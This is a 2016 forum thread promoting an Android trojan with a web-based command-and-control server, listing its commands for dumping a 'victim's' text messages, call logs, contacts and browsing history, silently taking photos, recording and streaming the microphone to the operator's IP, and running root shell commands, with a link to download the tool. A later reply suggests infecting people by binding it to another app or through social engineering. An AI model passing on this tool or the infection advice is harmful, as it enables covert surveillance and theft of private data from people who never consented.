2016-08-30 at 4:51 PM UTC
I came across a neat little trojan written in Java, built with SDK22 that i thought might interest some of you. The trojan is complete with a client and server module. The C&C is web based and the client features include but are not limited to the following.
- Remote administration
- Execute shell commands
- Record & live stream phone calls
- Copy and send all text messages to C&C
The commands the client takes are below.
Command : - execute regular shell command on the victim's device
Upload file : - should be filled with full path to the file that will be uploaded to logs/ directory on your server
Spec commands:
root [command] - try to execute command as root (if device is rooted)
sms - get all sms dump from device
download [file_url] - download file from the specified url onto device (into app's data/files directory)
restart - restarts the service
loc - get last known location (active location isnt used because it can be too alarming for victim)
info - get basic informaion such as current connection type,battery level, available memory and service provider name
record [secs] - record sound from the mic for amount of seconds (will be saved to data/files/logs)
stream [ip] [port] - start real-time streaming sound from the device's mic via udp to your listening computer * (client is described later)
sync - upload all files that were logged to the app's files/logs directory
quit - end shell session
clear - clear data/logs directory
photo - silently make photos from all available cameras on device (1 from each) and save them to files/logs
calllogs - get victim call's history
bookmarks = get bookmarks from the system browser
history - get browsing history from the system browser
screenshot - make a screenshot of the device's current screen (works on rooted device only)
getcontacts - get contact list with names and numbers from the device
sendsms [number] [text] - send sms to specified number with some text
Pretty dank, as a tool for mobile pentests and interesting from an analysis perspective imho. Check out the repo below for more details and to download/clone your own sample.
https://github.com/androidtrojan1/android_trojan
The following users say it would be alright if the author of this
post didn't die in a fire!
2016-08-31 at 10:42 PM UTC
On second thought if you were trying to infect people remotely i could see how social engineering or in effect binding it to another APK would be useful. Or you could just make a useful app around it i suppose.
2016-08-31 at 11:28 PM UTC
pokemon go has more permissions.